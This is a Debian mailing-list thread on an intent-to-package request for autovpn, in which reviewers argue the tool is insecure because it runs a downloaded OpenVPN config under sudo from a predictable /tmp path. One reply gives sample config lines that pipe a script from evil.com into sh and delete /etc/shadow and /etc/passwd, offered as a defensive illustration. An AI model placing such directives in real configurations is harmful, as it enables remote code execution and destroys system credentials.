Bug#890816: ITP: autovpn -- Connect to a VPN in a country of your choice
Michael Meskes dijo [Mon, Feb 19, 2018 at 12:44:40PM +0100]: > > I'd strongly urge you to reconsider packaging this project, for > > three main reasons: > > > > * It relies upon the external VPNGate.net site/service. If this > > goes away in the lifetime of a stable Debian release users will > > be screwed. > > That is actually a good point. I wonder if using a local copy might be > a good alternative. I suppose the information it downloads is needed to keep the database up to date. Thinking about a lifetime of ~5 years (stable+oldstable), I don't think we could work around that > > * It allows security attacks on against the local system which the > > remote service could exploit: > > > > 1. The tool downloads a remote URL to /tmp/openvpnconf > > > > 2. The file is then given as an argument to the command: > > sudo openvpn /tmp/openvpnconf > > > > 3. That generated/downloaded openvpn configuration file could > >be written to do anything, up to and including `rm -rf /`. > > Can you actually get openvpn to do this? Depends on what information you put in /tmp/openvpn.conf, I guess. The least likely candidates end up opening holes - i.e. remember the quite recent KDE notifier bug allowing FAT volume labels containing $() to be executed :-P I mean - It might be completely OK. But given this creates configuration for setting up a high-privileged daemon from a public place, it'd be on you to carefully comb on the relevant parts of the source to assert the handling of this information is sensible.
Bug#890816: ITP: autovpn -- Connect to a VPN in a country of your choice
> For the records I do not think that this is important since the > whole > purpose of the program is accessing this data, but the other > objections > are significant enough that I do not see much value in having this > packaged. I agree that Steve's last point got me, too. As long as one has to check the created config file manually there is no point in automating the rest of it. > > That is actually a good point. I wonder if using a local copy might > > be > > a good alternative. > > Obviously not, since it would quickly become stale considering the > nature of the data. This I don't understand. The way I understand it these are legit offerings by universities, telcos, etc. Why should they become stale? Michael -- Michael Meskes Michael at Fam-Meskes dot De, Michael at Meskes dot (De|Com|Net|Org) Meskes at (Debian|Postgresql) dot Org Jabber: michael at xmpp dot meskes dot org VfL Borussia! Força Barça! SF 49ers! Use Debian GNU/Linux, PostgreSQL signature.asc Description: This is a digitally signed message part
Bug#890816: ITP: autovpn -- Connect to a VPN in a country of your choice
On Feb 19, Michael Meskeswrote: > > * It relies upon the external VPNGate.net site/service. If this > > goes away in the lifetime of a stable Debian release users will > > be screwed. For the records I do not think that this is important since the whole purpose of the program is accessing this data, but the other objections are significant enough that I do not see much value in having this packaged. > That is actually a good point. I wonder if using a local copy might be > a good alternative. Obviously not, since it would quickly become stale considering the nature of the data. -- ciao, Marco signature.asc Description: PGP signature
Bug#890816: ITP: autovpn -- Connect to a VPN in a country of your choice
> I'd strongly urge you to reconsider packaging this project, for > three main reasons: > > * It relies upon the external VPNGate.net site/service. If this > goes away in the lifetime of a stable Debian release users will > be screwed. That is actually a good point. I wonder if using a local copy might be a good alternative. > * It allows security attacks against the local system, which other > users on the host could exploit via symlink attacks on > /tmp/openvpnconf True, but this could be handled by using a better system to access a temp file. > * It allows security attacks on against the local system which the > remote service could exploit: > > 1. The tool downloads a remote URL to /tmp/openvpnconf > > 2. The file is then given as an argument to the command: > sudo openvpn /tmp/openvpnconf > > 3. That generated/downloaded openvpn configuration file could >be written to do anything, up to and including `rm -rf /`. Can you actually get openvpn to do this? > Finally the project itself notes: > > "This is completely insecure. Please do not use this for anything > important. Get a real and secure VPN. This is mostly a fun tool > to > get a VPN for a few minutes." I read this not as "insecure for the system it runs on" but "insecure on the connection side". This is certainly not something you should use to open your local network to, or to do something illegal. Michael -- Michael Meskes Michael at Fam-Meskes dot De, Michael at Meskes dot (De|Com|Net|Org) Meskes at (Debian|Postgresql) dot Org Jabber: michael at xmpp dot meskes dot org VfL Borussia! Força Barça! SF 49ers! Use Debian GNU/Linux, PostgreSQL
Bug#890816: ITP: autovpn -- Connect to a VPN in a country of your choice
On Mon Feb 19, 2018 at 12:44:40 +0100, Michael Meskes wrote: > > * It relies upon the external VPNGate.net site/service. If this > > goes away in the lifetime of a stable Debian release users will > > be screwed. > > That is actually a good point. I wonder if using a local copy might be > a good alternative. If you're willing to maintain such a list, resyncing it every few days/months to reap dead-entries and add new ones then that would be good. > > * It allows security attacks against the local system, which other > > users on the host could exploit via symlink attacks on > > /tmp/openvpnconf > > True, but this could be handled by using a better system to access a > temp file. Sure. If you changed the code to use ioutil.TempFile, or some other secure alternative that specific objection will go away. > > 1. The tool downloads a remote URL to /tmp/openvpnconf > > > > 2. The file is then given as an argument to the command: > > sudo openvpn /tmp/openvpnconf > > > > 3. That generated/downloaded openvpn configuration file could > >be written to do anything, up to and including `rm -rf /`. > > Can you actually get openvpn to do this? Yes. For example these snippets will do what you fear they will: script-security 2 up curl http://evil.com/root-me.sh | sh up rm /etc/shadow down rm -f /etc/passwd > I read this not as "insecure for the system it runs on" but "insecure > on the connection side". This is certainly not something you should use > to open your local network to, or to do something illegal. As per the insecure fixed name, and the execution of commands from a remote HTTP-site (not even SSL!) I think it is insecure in all regards. Also I guess you'll need to change the script to remove "sudo", or better yet add a restricted user with sudo's nopasswd setup for it (shudder). Steve -- https://www.steve.org.uk/
Bug#890816: ITP: autovpn -- Connect to a VPN in a country of your choice
> Version : 0.0~git20170129.72dd7f6-1 > Upstream Author : Adhityaa C> * URL : https://github.com/adtac/autovpn .. > autovpn is a tool to automatically connect you to a random VPN > in a country of your choice. It uses openvpn to connect you to a server > obtained from VPN Gate (http://www.vpngate.net/en/). I'd strongly urge you to reconsider packaging this project, for three main reasons: * It relies upon the external VPNGate.net site/service. If this goes away in the lifetime of a stable Debian release users will be screwed. * It allows security attacks against the local system, which other users on the host could exploit via symlink attacks on /tmp/openvpnconf * It allows security attacks on against the local system which the remote service could exploit: 1. The tool downloads a remote URL to /tmp/openvpnconf 2. The file is then given as an argument to the command: sudo openvpn /tmp/openvpnconf 3. That generated/downloaded openvpn configuration file could be written to do anything, up to and including `rm -rf /`. > A small tool that comes handy in particular for people who travel a lot. Will > be maintained in the go-team. Finally the project itself notes: "This is completely insecure. Please do not use this for anything important. Get a real and secure VPN. This is mostly a fun tool to get a VPN for a few minutes." Steve --
Bug#890816: ITP: autovpn -- Connect to a VPN in a country of your choice
Package: wnpp Severity: wishlist Owner: Michael Meskes* Package name: autovpn Version : 0.0~git20170129.72dd7f6-1 Upstream Author : Adhityaa C * URL : https://github.com/adtac/autovpn * License : GPL V3 Programming Lang: Go Description : Connect to a VPN in a country of your choice autovpn is a tool to automatically connect you to a random VPN in a country of your choice. It uses openvpn to connect you to a server obtained from VPN Gate (http://www.vpngate.net/en/). A small tool that comes handy in particular for people who travel a lot. Will be maintained in the go-team. Michael